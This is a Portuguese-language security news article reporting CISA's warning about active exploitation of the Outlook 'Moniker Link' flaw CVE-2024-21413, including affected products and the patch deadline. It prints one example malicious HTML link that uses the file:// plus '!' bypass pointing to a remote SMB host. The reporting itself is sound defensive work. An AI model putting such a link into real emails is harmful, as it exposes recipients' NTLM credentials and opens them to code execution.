Microsoft Outlook Sob Ataque: Falha grave permite execução de ataque RCE
- Cyber Security Brazil
- 9 de fev.
- 2 min de leitura
A Agência de Segurança Cibernética e Infraestrutura dos Estados Unidos (CISA) alertou, na última quinta-feira, as agências federais sobre ataques em andamento que exploram uma falha crítica de execução remota de código (RCE) no Microsoft Outlook.
Descoberta pelo pesquisador de vulnerabilidades Haifei Li, da Check Point, e rastreada como CVE-2024-21413, essa falha é causada por uma validação inadequada de entrada ao abrir e-mails contendo links maliciosos em versões vulneráveis do Outlook.
Os hackers exploram essa vulnerabilidade para obter a capacidade de executar código remotamente, pois ela permite burlar o Modo Protegido (Protected View)—uma camada de segurança que impede a execução de conteúdos maliciosos ao abrir arquivos do Office em modo somente leitura. Dessa forma, documentos maliciosos são carregados diretamente no modo de edição, facilitando a exploração.
Quando corrigiu a CVE-2024-21413 há um ano, a Microsoft já havia alertado que a Visualização de Prévia (Preview Pane) também é um vetor de ataque, permitindo a exploração da falha apenas ao visualizar documentos maliciosamente manipulados.
Segundo a Check Point, essa vulnerabilidade, chamada Moniker Link, possibilita que hackers contornem as proteções nativas do Outlook ao incorporar links maliciosos em e-mails usando o protocolo file:// e adicionando um ponto de exclamação (!) após a extensão do arquivo. Isso direciona a vítima para servidores controlados pelos invasores.
Exemplo de link malicioso explorando essa técnica:
<a href="file:///\\10.10.111.111\test\test.rtf!algo">CLIQUE AQUI</a>
A CVE-2024-21413 afeta diversos produtos da Microsoft, incluindo Office LTSC 2021, Microsoft 365 Apps for Enterprise, Outlook 2016 e Office 2019. Explorações bem-sucedidas dessa falha podem resultar no roubo de credenciais NTLM e na execução de código arbitrário por meio de documentos maliciosamente manipulados.
Na última quinta-feira, a CISA adicionou essa vulnerabilidade ao seu catálogo de Vulnerabilidades Exploradas Conhecidas (KEV), classificando-a como ativamente explorada. Conforme determinação da Diretiva Operacional Vinculativa (BOD) 22-01, agências federais devem corrigir essa falha até 27 de fevereiro.
"Esse tipo de vulnerabilidade é frequentemente explorado por hackers e representa um risco significativo para as redes federais", alertou a CISA.
Embora o foco da CISA seja a proteção de sistemas governamentais, empresas privadas também são fortemente recomendadas a aplicar as correções o mais rápido possível para evitar ataques em andamento.
Via - BC
Comments